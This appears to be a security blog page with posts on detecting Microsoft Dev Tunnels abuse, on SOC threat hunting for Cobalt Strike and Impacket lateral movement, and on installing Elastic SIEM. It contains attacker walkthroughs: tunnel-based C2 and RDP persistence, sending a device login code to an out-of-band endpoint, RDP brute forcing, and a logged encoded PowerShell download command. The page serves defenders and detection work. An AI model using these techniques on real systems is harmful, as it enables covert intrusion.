Tag: elastic

Microsoft Dev Tunnels: Tunnelling C2 and More

Attackers are always looking for ways to blend into an environment, to establish a C2 channel undetected. Utilising legitimate tooling for their malicious activities is a common way that they achieve this.

From a defender’s standpoint, spotting activity that’s meant to blend in can be quite challenging. A SOC team, especially one experiencing alert fatigue, might often resort to checking a domain or hash on VirusTotal. If it’s a known domain or hash, particularly one signed or trusted by Microsoft, they might quickly label it as a false positive and move on.

Microsoft Dev Tunnels

Dev Tunnels allow developers to expose services running locally to remote hosts, across the internet and tunneled through Microsoft infrastructure. For example, let’s say I have a simple webserver running on my PC, I want a colleague to be able to test the web page I’ve created. I can use a Dev Tunnel to expose port 443 on my host. A Microsoft Dev Tunnel domain is generated *.devtunnels.ms, I provide the URL to my colleague, and they can access the web service on my local host, via the Microsoft URL.

I can expose any service via the Dev Tunnels, including RDP and SSH. With the ability to tunnel traffic using Microsoft domains, you can imagine why this would be an attractive concept to attackers.

There have been increased reports of threat actors utilising Microsoft Dev Tunnels and other legitimate remote tools in their campaigns. So, let’s walk through the different ways Dev Tunnels can be abused by attackers.

Scenario One: Using for C2

Firstly, using Dev Tunnels for C2. Take the diagram below as an example. A victim PC has executed a payload, and the C2 beacon is configured to connect to a Microsoft Dev Tunnels domain.

In most environments, the domain will pass through any proxy or firewall, due to the domain belonging to Microsoft. The traffic is then forwarded by Microsoft to the attacker’s machine.

Dev Tunnel Diagram

Creating a tunnel

Meanwhile, if we look at the attacker’s perspective, all they need to do is install the dev tunnel binary, which is available on Mac, Linux, and Windows.

Some key details on establishing a tunnel below:

  • Authentication: To create a tunnel, you need to authenticate to either a personal GitHub or Microsoft Account. Obviously setting up an account with either is trivial.
  • Anonymous Access: You can configure a tunnel to allow anonymous access, allowing anyone to connect to your tunnel.
  • Tunnel ID: Following the creation of a tunnel, a tunnel ID is generated, this is used to connect two endpoints together through a tunnel.

The highlighted URL below is what we will use for our C2 beacon.

Dev Tunnel C2 URL

Establishing C2

The process for utilising a Dev Tunnel domain for C2 traffic will be similar across different C2 frameworks. Below is an example of creating a listener in Cobalt Strike.

  1. Select Beacon Type, usually HTTPS.
  2. Define the HTTPS host to listen on, in this case, it would be our tunnel domain, 8kl69l904-443.uks1.devtunnels.ms
  3. Define the HTTPS host (stager), the IP of your team server.
  4. Select HTTPS Port, 443.
Dev Tunnel Cobalt Strike

Example Event

In the event shown below, we can see connections to our tunnel domain, from our beacon process. The beacon process is a fake OneDrive binary, which has a forged Microsoft certificate.

@timestampdns.question.nameprocess.code_signature.subject_nameprocess.nameuser.nameprocess.code_signature.trusted
Sep 1, 2024 @ 11:44:50.1698kl6l904-443.uks1.devtunnels.mswww.microsoft.comOneDrive.exepaulfalse
Sep 1, 2024 @ 11:44:50.1488kl6l904-443.uks1.devtunnels.mswww.microsoft.comOneDrive.exepaulfalse
Aug 31, 2024 @ 23:00:18.6698kl6l904-443.uks1.devtunnels.mswww.microsoft.comOneDrive.exepaulfalse
Aug 31, 2024 @ 23:00:18.6498kl6l904-443.uks1.devtunnels.mswww.microsoft.comOneDrive.exepaulfalse
We’ve giving our payload a fake certificate, it’s signed, but not trusted.
Cobalt Strike Signed Binary
Elastic EDR Dev Tunnel Tree

Detecting Dev Tunnel C2

Detecting the usage of Dev Tunnels for C2 is challenging, as the Dev Tunnels binary does not need to be present on the target host. In cases where EDR or endpoint controls fail to detect the initial payload, detecting on network-based telemetry would be challenging. As expected, the TLS connections have a valid certificate as they are after all legitimate Microsoft domains.

Dev Tunnel Domain Signed

We can look to identifying C2 traffic by looking for constant connections to the Dev Tunnel domains over sustained periods. C2 traffic

Dev Tunnel C2 Detect

Below is the query used in TimeLion to generate the above:

.es(
  index='.ds-logs-network_traffic*',
  q='destination.domain: *.uks1.devtunnels.ms',
  timefield='@timestamp',
  metric='count'
).bars(),
.es(
  index='.ds-logs-network_traffic*',
  q='destination.domain: *.uks1.devtunnels.ms',
  timefield='@timestamp',
  metric='cardinality:destination.domain'
).lines(width=2, stack=false).label("Unique Domains")

We can also use a more generic C2 detections methods, looking for high volume connections to single domains. The below shows count of connections to single domains over a 24 hour period. We can see clear outliers to our Dev Tunnel C2 domains, where constant connections are made.

Dev Tunnel C2 Detect

Network with Endpoint Telemetry

Many EDR products now are able to join domain requests with the process responsible for making the request. You can also usually enrich the binary with certificate information, looking for connections to dev tunnel domains from a non-signed or untrusted certificate can also be a method of detection.

dns.question.name : *.uks1.devtunnels.ms and process.code_signature.trusted<br>: false  

This however will not help for payloads running from a trusted source. For example sideloading or injecting a payload into a trusted process like Outlook will be more difficult to detect.

As shown below, loading a secondary payload into Outlook, shows C2 to a trusted Microsoft Domain from a trusted Microsoft Process.

Dev Tunnels C2 from trusted Process

In these cases, anomaly C2 on the Dev Tunnel domains would be required. With analysts paying focus to the surrounding and contextual activity, like looking for unusual loads or injections into the process making the requests.


Using for Persistent Access

Dev Tunnels can be used for more than just C2. As we said before, any port can be exposed for remote usage. Therefore, RDP and SSH are good candidates, allowing a threat actor to establish persistent remote access.

Ideally, we would want a scripted method of establishing and maintaining remote access via Dev Tunnels.

I created a simple PowerShell Script that does the following on a victim host.

  • Downloads a copy of Dev Tunnels and places it in a Windows Start-Up Location.
    • Download from: https://aka.ms/TunnelsCliDownload/win-x64
    • Place in: C:\Users\paul\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
  • Authenticates the Dev Tunnel process to an account.
    • More on this further down.
  • Sets up a tunnel, exposing port 3389 to allow for anonymous access.

Github Device Authentication

When first using Dev Tunnels on a device, you must authenticate. To do this in a scripted manner, we can use GitHub Device authentication:

devtunnel user login -g -d
Login with a GitHub account with device code login, if local interactive browser login isn’t possible

When this command is run, a device login code is written to the terminal. Using our PowerShell script, we can capture this code by writing it to a .txt file. We can then pull the string from the file, and send it to ourselves.

Dev Tunnel Script

We can use interactsh to receive the login code, but sending a POST request to our OAST domain from the PowerShell Script.

Dev Tunnel Git Login Code

We can then use the device code to authenticate to a our attacker GitHub account, via https://github.com/login/device

Dev Tunnel Git Auth

Establishing Tunnel

Now that we’ve authenticated, our PowerShell script can continue, by setting up a tunnel.

This is as easy as running a command like the one below. Port 3389 is being exposed and allows for anonymous login.

.\devtunnel.exe host -p 3389 -allow-anonymous

Dev Tunnel Setup via Script

Now that the tunnel is setup, we can authenticate to the same GitHub account from our attacker machine.

We can list out tunnels that are running within our account, and connect to the tunnel exposing RDP on our victim device by specifying the tunnel ID.

Dev Tunnel RDP

In order to connect via RDP we need to authenticate to a user on the device. If we do not already have a compromised user, we can brute force RDP via the tunnel.

Traffic is forwarded from local host, through the tunnel, to our victim host on port 3389. Therefor, to brute force, we specify local host as our target, and we’re able to brute force RDP on our victim host.

Dev Tunnel RDP Brute Force

Once we have an account to utilise, we can use a RDP client to connect. Again specifying the local host address as the the remote host, and authenticating with our compromised user.

Dev Tunnel RDP Connect
Dev Tunnel RDP Connect

This means you could in theory expose a host remotely, via a single PowerShell script, making it a candidate in phishing. This can be a method of bypassing RDP restrictions on a network, exposing internal hosts, remotely.

Detections

I’m using Elastic SIEM and Endpoint agent to collect telemetry and build custom detections.

Dev Tunnel Binary Execution Detection

In circumstances where an attacker has brought the Dev Tunnel binary onto disk, you could catch them with a simple:

Process.Name:devtunnel.exe OR File.Name:devtunnel.exe

But any decent operator is going to rename the process to something else.

You could look for the initial download, via PowerShell or WinGet

CommandLine= "*winget install Microsoft.devtunnel*"
OR 
URL= "*https://aka.ms/TunnelsCliDownload/win-x64*"

But again, these are easy to bypass, and an attacker will likely bring the tool down from their own infrastructure.

A more robust way of detection is took look for a certain DLL that the tunnel requires for operation. Looking at module load events and there’s a variety of DLLs loaded by the devtunnel.exe, but one sticks out as an easy detection, devtunnel.dll.

event.action: "load" and dll.name: "devtunnel.dll"

The DLL is loaded from a temp .net directory that is created on execution. This is a behaviour that an attacker would not be able to manipulate.

Tunnelling RDP Detection

You’ll notice the source IP in the logs for this activity is displayed as ::1, this is the loopback address for the host, or 127.0.0.1. As we are forwarding traffic from local host on our attacker machine from our victim machine, this is the address that is displayed.

Dev Tunnel RDP

Interestingly the logon type is captured as type 3, rather than type 10. The below query will show both successful and failed logons originating from a loopback address. Putting this into a detect would likely generate a lot of noise and FPs.

event.provider: "Microsoft-Windows-Security-Auditing" and event.code: 4625 or event.code : 4624 and (source.ip : "::1" or source.ip : 127.0.0.1)

Instead we can use a threshold detection to attempt to detect suspected brute forcing, from a loopback address.

Dev Tunnel RDP Brute Force Detect
Dev Tunnel RDP Brute Force Detect
Dev Tunnel RDP Brute Force Detect

Incident Response Triage & Logging

Unfortunately there is very little in the way of logging for Dev Tunnels. Unlike Microsoft VSCode Remote tunnels, which is a different implementation of the same underlying tunnel features, (more on how they can be abused another time), there is no dedicated logging for tunnel usage.

If you’re responding to an incident that involves the use of Dev Tunnels, and you do not have host or network telemetry, then your best option is to dump the Dev Tunnel process. We can get all the key information from the process dump.

Dev Tunnel URL from Memory
Dev Tunnel ID from Memory

Including the username the tunnel authenticated with.

Dev Tunnel username from Memory

Closing Thoughts

As shown, Dev Tunnels provide powerful capabilities that can be (and are) abused by Threat Actors, to make detection by Blue Teams more difficult. The best option is to outright block tunnel usage in the estate, this can be achieved by blocking the Dev Tunnel Domains listed below.

IOCs

File Hashes

FileNameSHA256
Devtunnel.execb2d8470a77930221f23415a57bc5d6901b89de6c091a3cfbc563e4bf0e7b4eb
devtunnel.dllc0513783d569051bdc230587729b1da881f7032c2ad6e8fedbbdcc61d813da25

Domains

DescriptionDomain
Dev Tunnel Domainglobal.rel.tunnels.api.visualstudio.com
Dev Tunnel Domain*.rel.tunnels.api.visualstudio.com
Dev Tunnel Domain*-data.rel.tunnels.api.visualstudio.com
Dev Tunnel Domain*.devtunnels.ms
GitHub Device Auth URL https://github.com/login/device
Tunnel Install URL https://aka.ms/TunnelsCliDownload/win-x64

A Guide to Threat Hunting in a SOC

Introduction

You’d be forgiven for thinking that Threat Hunting is just another Cyber Buzz Word/Phrase spreading throughout the industry, the latest term used to push more product and managed services on a SOC. The reality, however, is that Threat Hunting is an extremely valuable skill and one that every SOC should have.

In fact, I believe that Threat Hunting provides more value than the traditional approach that many SOCs take. The traditional approach being switch on pre-made generic rules from a range of cyber tools like AV and IDS, as well as ingest IOCs from Intel Providers and search for them across the estate.

This typical approach would be what I call a reactive model. A team of analysts sit around waiting for alerts from different tools to trigger, they then triage the alerts and perform an investigation.

In my view, there are a few issues with this approach.

The issues

  • False Positives: Many generic alerts can be prone to false positives. Vendors design rules to work on many different estates. They’re not designed to work on your specific estate. Additionally, with IOCs, bad intel from a provider can generate a lot of noise on your estate.
    • Of course, rules can be tuned to perform better and cut false positive noise. But this is not always easy or even possible.
    • Additionally, false positives play a huge role in creating analyst fatigue. Investigating and closing the same false positives day after day will quickly cause analysts to become frustrated, and lose interest. Team productivity will drop as a result.
    • If analysts are used to closing false positives all the time, chances are they’ll wrongly close a true positive as a false positive for rules that are particularly noisy.
  • Detection Gaps: With a reactive approach, you’re sitting relying on the rules that you have to detect the full spectrum of malicious activity.
    • It requires you to have good detection coverage, but also requires you to have a complete picture of your detection coverage and your detection gaps.
    • Using frameworks like Mitre is incredibly useful for finding gaps in coverage. However, the reality is most SOCs do not have their coverage mapped to a framework.
    • Red Teams can help find gaps in detection coverage. However, most SOCs will only perform one Red Team a year, and a lot can change in a year.

A Different Approach

Some SOCs do already perform threat hunting on their estates, but in most cases this is conducted sporadically when there’s some free time. Free time can be hard to come by when you’re closing false positives all day.

What if instead of spending 90% of time reacting to alerts, the focus was switched to a proactive model? Or if 90% of the time was spent Threat Hunting instead. What impact would that have?

The Benefits

  • Assume Breach: Assume Breach is a common phrase in the industry. It’s a mentality that analysts are encouraged to have when triaging alerts, “assume there’s been a breach”. But sitting around waiting for alerts to come in doesn’t practice this mentality. However, with a Threat Hunting focused approach, you’re forced to hold this mentality, as you’re actively looking for threats and successful breaches.
  • Being Proactive: Being proactive and looking for threats is a better use of time than sitting around waiting for alerts to come in.
    • You’re not reliant on rules and detections you have, and you can hunt for activity where you have detection gaps.
  • Team Productivity: Analysts will be more productive. If they’re hunting for new and interesting activity each day, they’ll be more engaged and interested in their work.
    • Good research-based threat hunting takes skill, and analysts will develop their technical knowledge by conducting in-depth research before hunts.

Understanding Threat Hunting

So we now know the benfits of Threat Hunting, but what actually is it? And how can you do it?

Well, the first thing to make clear is that Threat Hunting is not taking a bunch of IPs and other IOCs and searching for them across your estate. Take a look at the pyramid below. It’s called the Pyramid of Pain. What this pyramid illustrates is the “pain” or effort an attacker will experience if you are able to detect an indicator in each block.

Pyramid of Pain

For example, if we were to take the tool Mimikatz as an example. If you detect Mimikatz based on its hash value it would be trivial for an attacker to change the value of the application, therefore, bypassing your detection. However, if you detected Mimikatz by looking for uncommon processes establishing a handle to LSASS, that would be significantly harder for an attacker to bypass. Additionally, you would also detect other attack tools which exploit LSASS.

Threat hunting should be focused on the top two blocks of the pyramid, TTPs and Tools.

Threat Hunt Model

There are an infinite amount of different threat hunting models available on the internet. But most of them are more or less the same. The typical model looks like this.

Threat hunt model
  • Research: This is one of the phases that I often see overlooked. This is what kicks off your threat hunt. Research can come from a variety of places, maybe you see a new POC for a tool being shared on Twitter. Or maybe you read a blog on a new attack vector. Regardless, this kick starts your research. From here, you dig deeper and investigate the attack vector.
  • Data and Telemetry: Once you have an understanding of the attack vector, you need to establish whether or not you have the correct data set to detect the threat. Whether it be proxy logs, endpoint logs, or something else.
  • Build Hypothesis: This is where you establish the logic of your hunt analytic. This stage is closely linked to the research phase. In my experience, the best way to build a hypothesis is to first test the attack vector. Build a lab and practice using the attack tool, or experiment with the attack vector. Once you’ve successfully experimented, review your logs. Observe what data was collected.
  • Create Hunt Analytic: Next you need to formulate your search. This is essentially where you test your hypothesis against your data & telemetry. A hunt analytic could be anything from a parent and child process relationship or maybe a specific filename and command line value.
  • Investigate and Incident Response: This obviously only occurs if you find some badness while hunting.
  • Tune Review Analytic: Here is where you improve your search to cut out the noise. Likewise, if it’s been turned into an automated analytic, refine it to cut out any false positives.

Let’s Get Technical – Demo

Let’s take a look at a threat hunting example by exploring some lateral movement techniques using Cobalt Strike and Impacket. Both of the techniques are not detected by some of the best EDRs on the market, which makes them a good candidate for Threat Hunts.

It’s worth bearing in mind that while EDRs are great tools that have really enhanced the detection capabilities of many organisations around the world, they’re not perfect. They can be bypassed and there are gaps in their coverage. You should never be reliant on just one security tool, and this again proves the value of threat hunting.

Testing Environment

The test environment is made up of two hosts, a desktop PC and a Domain Controller. A market-leading EDR (that shall remain nameless) is installed on the DC. Both hosts have Sysmon running on them with the SwiftOnSecurity Sysmon Config, and these logs are being fed into ELK.

If you’d like to see how to setup ELK SIEM, you can see my previous blog here.

Attackers Perspective

First, let’s paint the picture of what the attacker has done on our hosts, so it’s clearer what we’re threat hunting for.

  1. User HR was sent a malicious link to a .hta file, which when opened, executes a malicious payload to spawn a Cobalt Strike Beacon running under the user’s context.
  2. As the user does not have admin privileges, the attacker performed privilege escalation. This was done by uploading a secondary payload to the host (via the beacon) and executing it under escalated context using the fodhelper UAC bypass.
  3. This gives us a new beacon running under a higher privileged context. From here, credentials on the host were dumped using Mimikatz via the beacon.
  4. The next step is where we’re going to perform our lateral movement.
    1. Before we do, it’s worth mentioning that a lot of the above activity would have been detected by most EDRs, but there are obviously other ways to achieve the same objectives which can go undetected.
    2. The first method of lateral movement is using wmiexec from Impacket. Using the administrator’s credentials stolen with Mimikatz, we are able to get an interactive shell to the domain controller. Let’s see what using wmiexec looks like, and how we can detect it in a hunt.
Cobalt Strike Attack Tree

WMIEXEC

As wmiexec is open source and the code is available on GitHub, one of the things we might do as part of our research phase is analyse the tools code. One part of the code that sticks out is the remote shell function. We can see here that cmd.exe is being launched, and is parsing flags “/Q /c “. We also know that WmiPrvSE.exe is likely to be the parent of cmd.exe, as it’s wmi we’re exploiting to establish our shell.

lass RemoteShell(cmd.Cmd):       
                
    .......................................
        self.__output = '\\' + OUTPUT_FILENAME       
                
        self.__outputBuffer = str('')       
                
        self.__shell = 'cmd.exe /Q /c '       
                
        self.__shell_type = shell_type       
                
      ........................................
                     
        self.intro = '[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands'       
                

With that in mind, we can use a query like the one below, to search for cmd.exe as a child of wmiPrvSE.exe with the command line ” cmd.exe /Q /c” followed by a wildcard.

process.parent.name : "WmiPrvSE.exe" and process.pe.original_file_name: Cmd.Exe and process.command_line :   cmd.exe /Q /c *

Searching on this activity returned a few results, including this event.

Process Create:
 RuleName: -
 UtcTime: 2021-06-27 16:31:42.163
 ProcessGuid: {75D30705-A7EE-60D8-2748-0E0000000000}
 ProcessId: 4956
 Image: C:\Windows\System32\cmd.exe
 FileVersion: 10.0.14393.0 (rs1_release.160715-1616)
 Description: Windows Command Processor
 Product: Microsoft® Windows® Operating System
 Company: Microsoft Corporation
 OriginalFileName: Cmd.Exe
 CommandLine: cmd.exe /Q /c powershell.exe -exec bypass -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AYwBvAG0AbQBhAG4AZAAgACIASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAxADkALgAxADMANwA6ADgAMAAvAGQAbwB3AG4AbABvAGEAZAAvAG4AZgBzAC4AZQB4AGUAJwAgAC0ATwB1AHQARgBpAGwAZQAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAXABEAG8AdwBuAGwAbwBhAGQAcwBcAG4AZgBzAC4AZQB4AGUAIgA= 1> \127.0.0.1\ADMIN$__1624811482.3061206 2>&1
 CurrentDirectory: C:\
 User: RT-LAB\Administrator
 LogonGuid: {75D30705-A7DA-60D8-9E31-0E0000000000}
 LogonId: 0xE319E
 TerminalSessionId: 0
 IntegrityLevel: High
 Hashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A
 ParentProcessGuid: {75D30705-A634-60D8-BC12-050000000000}
 ParentProcessId: 3868
 ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe
 ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

There’s some interesting stuff here. Based on the command line it looks like a PowerShell command encoded in base64 is being executed, where the output of the command is then written to a temp file in an admin share.

We can use the writing of a file to an admin share to better improve our search query.

FYI, the use of wmiexec to launch PowerShell to then download a malicious executable went undetected by our EDR.

Hunt Performance

Our original query from before returned over 70 hits over a 30 day period on an estate with over 20,000 devices. That’s not bad, but we can improve our hunt query using the new information we now have.

process.parent.name : "WmiPrvSE.exe" and process.pe.original_file_name: Cmd.Exe and process.command_line: \127.0.0.1\ADMIN$

Running the query above returned hits for only our attacker activity, nothing else. Making it a good hunt, we could probably turn this into a high confidence detection based on the 0% false-positive rate.

Lateral Movement with Cobalt Strike

Interestingly wmiexec isn’t the only attack tool that utilises the admin share. The “Jump” function that can be run from a Cobalt Strike beacon also writes a file into the admin share. If we look at the Lateral Movement (Spawn a Session) section of the Cobalt Strike Beacon Documentation we can see multiple functions that use the admin share.

Cobalt Strike Jump

If we look in our logs, we can see quite a few useful entries for the activity we can build hunts on.

Registry key added

We can see details of a registry key being added to the host as part of the creation of a new service.

Registry value set:
 RuleName: T1031,T1050
 EventType: SetValue
 UtcTime: 2021-06-27 21:38:44.784
 ProcessGuid: {75D30705-602A-60D7-E044-010000000000}
 ProcessId: 984
 Image: C:\Windows\system32\services.exe
 TargetObject: HKLM\System\CurrentControlSet\Services\0134ebf\ImagePath
 Details: \GSOC-Lab-DC\ADMIN$\0134ebf.exe
winlog.event_data.Details: \GSOC-Lab-DC\ADMIN$\0134ebf.exe
 winlog.event_data.EventType: SetValue
 winlog.event_data.TargetObject: HKLM\System\CurrentControlSet\Services\0134ebf\ImagePath
New Service

There’s a separate event for the installation of a new service, again with our new executable included.

A service was installed in the system.
 Service Name:  0134ebf
 Service File Name:  \GSOC-Lab-DC\ADMIN$\0134ebf.exe
 Service Type:  user mode service
 Service Start Type:  demand start
 Service Account:  LocalSystem
Process Creation

And finally we have the execution of the process.

Process Create:
 RuleName: -
 UtcTime: 2021-06-27 21:38:45.122
 ProcessGuid: {75D30705-EFE5-60D8-C3FA-260000000000}
 ProcessId: 1352
 Image: \GSOC-Lab-DC\ADMIN$\0134ebf.exe
 FileVersion: -
 Description: -
 Product: -
 Company: -
 OriginalFileName: -
 CommandLine: \GSOC-Lab-DC\ADMIN$\0134ebf.exe
 CurrentDirectory: C:\Windows\system32\
 User: NT AUTHORITY\SYSTEM
 LogonGuid: {75D30705-602B-60D7-E703-000000000000}
 LogonId: 0x3E7
 TerminalSessionId: 0
 IntegrityLevel: System
 Hashes: MD5=F43CA9DC11F486ED49BFF32C9A9AE78B,SHA256=A5EE87651D03534C449DA842C768903060C6CDF22A9896C6C66720CF313949C5,IMPHASH=BED5688A4A2B5EA6984115B458755E90
 ParentProcessGuid: {75D30705-602A-60D7-E044-010000000000}
 ParentProcessId: 984
 ParentImage: C:\Windows\System32\services.exe
 ParentCommandLine: C:\Windows\system32\services.exe

Hunting for this activity

There’s a few things we could hunt for to find this activity in the future.

  • Creation of a new service where the service file name includes the admin share.
  • Creation of a registry key by services.exe which calls a file in the admin share.
  • Process creation of a file located in the admin share with services.exe as the parent.
  • File written to disk in the admin share where file name matches the following regex “.admin\$\/[a-zA-Z0-9]{7}\.exe$”
    • When Cobalt Strike writes a file to the admin share, it generates a random file name consisting of 7 alphanumerical characters. This regex I’ve created here may need to be modified depending on the regex flavour you use.

What you need to hunt

To develop an effective basic threat hunting function in your SOC you do not need much.

  • Mitre Mapping: I would recommend mapping your hunts to Mitre, this will help you keep track of which coverage gaps you have hunted in and which need more focus.
  • Plan: Plan your hunts. This saves analysts from hunting for the same things and duplicating work.
  • Talented Analysts: Threat hunting is not easy, and it takes time and skill to perform research and develop hunts from research. Give your analysts the time, freedom and resources to perform research and hunts.
  • Logs: Make sure you have the basic logs coming into your SIEM or Search Platform. Proxy logs, endpoint logs (whether EDR or Sysmon), Authentication logs, etc…
  • Alerting: Believe it or not, I’m not against alerting and use cases, just low-quality ones. For hunts that produce a very low false-positive rate, hunt logic can be used to create a detection alert. Alerting obviously plays an important role in any SOC and needs to work alongside threat hunting.

Closing Thoughts

At the beginning of this post, I said that SOCs should spend 90% of their time threat hunting and 10% of time dealing with alerts and tickets. This is obviously not realistic. But what I think every SOC should do is put more resources into research-based threat hunting, and use that process to create high confidence detections. I generally do think at least 60% of analysts’ time should be spent researching and threat hunting on the estate. I believe that this can have a lot more value than spending the majority of the time responding to low-quality false positives.

A well-devleoped Threat Hunting function will aim to automate hunts and generate threat leads for analysts to pick up and investigate. In my mind, this could be used in the place of generic, low-quality detections.

More to come…

I’ll be releasing another post soon on how you can take threat hunting to the next level, and how you can incorporate the Sqrrl Framework into improving your threat hunt capability. As well as how you can automate threat hunts with a SOAR.

I’ll also be releasing some mini-posts on creating detections for common attack tools like Cobalt Strike and Impacket.

How to install Elastic SIEM and Elastic EDR

Installing Elastic EDR & SIEM

A few months ago I released a couple of blog posts on how to create enterprise monitoring at home with ELK and Zeek. This post is a continuation of that series….sort of. A lot has changed since those posts, mainly updates to the ELK stack and the release of a number of free EDR tools. OpenEDR released by Comodo and Elastic EDR. So I thought now would be a good time to see what’s changed with Elastic, and try out their new EDR. So for this post, I’m going to show how to install Elastic SIEM and Elastic EDR from scratch.

Network Design

Below is a very simple network diagram for this post. ELK is running on a Ubuntu 20.04 Server hosted on ESXi. Zeek is also running on a Ubuntu 20.04 server, and a port on my switch is being mirrored to a port on my ESXi server. You can read more about Zeek and port mirroring in my previous blog here.

Also running on ESXi is a Windows 10 machine, where we will install the Elastic EDR agent. I also have a Windows AD machine. This host does not feature in this post but will be used in future posts where I perform additional testing with the Elastic EDR.

Elastic SIEM network

Installing ELK Basics

I’m going to breeze through this section, as I’ve covered it before, and there are tons of guides out there already on how to get a basic ELK setup working. In my case, I’m using the newest release of ELK which is 7.10.

For my ELK setup, I’m using a single Ubuntu Server 20.04 virtual machine running on ESXi. This server will run Elasticsearch and Kibana.

First install transport-https

apt-get install curl apt-transport-https

Next add the Elastic repositories to your source list.

curl -s https://artifacts.elastic.co/GPG-KEY-elasticsearch | apt-key add -
echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | tee /etc/apt/sources.list.d/elastic-7.x.list

Then update.

apt-get update

Now install Elasticsearch

apt-get install elasticsearch 

Once Elasticsearch is installed, we need to make a couple of changes to its configuration file. This file is located in /etc/elasticsearch/elasticsearch.yml In order to access this file, you need root privileges.

First, we need to change the network.host value. Its default is set to the localhost. Change it to the IP address of the host you installed Elasticsearch onto.

network.host: <elasticsearch_ip>

Next within the same file, we need to change two node name values. In my case, I’ve just set both values to node-1

node.name: <node_name>
cluster.initial_master_nodes: ["<node_name>"]

Now you should be ready to start Elasticsearch and check that it’s started correctly.

service elasticsearch start
service elasticsearch status

You can also check that Elasticsearch is accessible from other hosts by running:

curl http://<elasticsearch_ip>:9200

The output should look similar to the one below, (Disclosure: this pic is stolen from my previous ELK post, hence why the details don’t match my new deployment)

Elasticsearch install

Installing Kibana

Run the command below to install Kibana.

apt-get install kibana

Once the installation is complete, edit your /etc/kibana/kibana.yml and specify the IP address hosting Kibana.

server.host: "Your_IP"

In the same file, also specify the IP address of your Elastic Instance.

elasticsearch.hosts: ["https://Your_ElasiticSearch_IP:9200"]

Start Kibana and check it’s status.

service kibana start
serivce kibana status

Installing Beats

Filebeat is used to ship data from devices to Elasticsearch. There are a number of different Filebeat modules for different products that send logs and data to Elasticsearch in the required format. In this example, we’re using the module for Zeek, but Elastic has greatly expanded it’s support for additional products in recent months, including AWS, CrowdStrike, ZScaler and more.

For now, we’re just going to install Filebeat on our host running Zeek, we’ll worry about configuring it later.

apt-get install filebeat

Configuring X-Pack

As it stands, the only functionality we have within our ELK deployment is log ingestion and visualisation. We can ingest logs into ElastiSearch, and manipulate the data with Kibana visualisations, but the core functionality of a SIEM is missing. We’re unable to build detections or use cases. This feature is not available “out of the box” and in order to use it, we must first configure security between all of our different nodes. X-Pack is the Elastic package which is basically responsible for all Elastic Security functionality.

One key component that is required is to configure SSL connections between each node, there are a number of ways to do this. We are going to use X-Pack to do this as well.

Firstly, on the host with Elasticsearch installed, we need to create a YAML file, /usr/share/elasticsearch/instances.yml which is going to contain the different nodes/instances that we want to secure with SSL. In my case, I only have Elasticsearch, Kibana and Zeek.

instances:
    - name: "elasticsearch"
      ip:
        - "192.168.1.232"
    - name: "kibana"
      ip:
        - "192.168.1.232"
    - name: "zeek"
      ip:
        - "192.168.1.234"

Next, we’re going to use Elastic’s certutil tool to generate certificates for our instances. This will also generate a Certificate Authority as well.

/usr/share/elasticsearch/bin/elasticsearch-certutil cert ca --pem --in instances.yml --out certs.zip

This will create a .crt and .key file for each of our instances, and also a ca.crt file as well.

You can unzip the different certificates with unzip.

unzip /usr/share/elasticsearch/certs.zip -d /usr/share/elasticsearch/

Now we have our certificates, we can configure each instance.

Configuring Elasticsearch SSL

Firstly, we need to create a folder to store our certificates in on our Elasticsearch host.

mkdir /etc/elasticsearch/certs/ca -p

Next, we need to copy our unzipped certificates to their relevant folders and set the correct permissions.

cp ca/ca.crt /etc/elasticsearch/certs/ca
cp elasticsearch/elasticsearch.crt /etc/elasticsearch/certs
cp elasticsearch/elasticsearch.key /etc/elasticsearch/certs
chown -R elasticsearch: /etc/elasticsearch/certs
chmod -R 770 /etc/elasticsearch/certs

Next, we need to add our SSL configuration to our /etc/elasticsearch/elasticsearch.yml file.

# Transport layer
xpack.security.transport.ssl.enabled: true
xpack.security.transport.ssl.verification_mode: certificate
xpack.security.transport.ssl.key: /etc/elasticsearch/certs/elasticsearch.key
xpack.security.transport.ssl.certificate: /etc/elasticsearch/certs/elasticsearch.crt
xpack.security.transport.ssl.certificate_authorities: [ "/etc/elasticsearch/certs/ca/ca.crt" ]

# HTTP layer
xpack.security.http.ssl.enabled: true
xpack.security.http.ssl.verification_mode: certificate
xpack.security.http.ssl.key: /etc/elasticsearch/certs/elasticsearch.key
xpack.security.http.ssl.certificate: /etc/elasticsearch/certs/elasticsearch.crt
xpack.security.http.ssl.certificate_authorities: [ "/etc/elasticsearch/certs/ca/ca.crt" ]

Now restart Elasticsearch.

service elasticsearch restart 

Configuring Kibana SSL

Now we’re going to repeat the process but this time for Kibana. The configuration is slightly different for Kibana.

Again, move your certificates to the correct folder and set the correct permissions.

Note: The following steps are assuming you are running a standalone ELK configuration. If you are running a distributed deployment, you’ll need to move certificates to the appropriate hosts.

mkdir /etc/kibana/certs/ca -p
cp ca/ca.crt /etc/kibana/certs/ca
cp kibana/kibana.crt /etc/kibana/certs
cp kibana/kibana.key /etc/kibana/certs
chown -R kibana: /etc/kibana/certs
chmod -R 770 /etc/kibana/certs

Next, in your file /etc/kibana/kibana.yml add the settings for SSL between Elasticsearch and Kibana.

# The URLs of the Elasticsearch instances to use for all your queries.
elasticsearch.hosts: ["https://192.168.1.232:9200"]
elasticsearch.ssl.certificateAuthorities: ["/etc/kibana/certs/ca/ca.crt"]
elasticsearch.ssl.certificate: "/etc/kibana/certs/kibana.crt"
elasticsearch.ssl.key: "/etc/kibana/certs/kibana.key"

And then in the same file, add the configuration between Kibana and your browser.

# These settings enable SSL for outgoing requests from the Kibana server to the browser.
server.ssl.enabled: true
server.ssl.certificate: "/etc/kibana/certs/kibana.crt"
server.ssl.key: "/etc/kibana/certs/kibana.key"

Then, restart Kibana.

service kibana restart

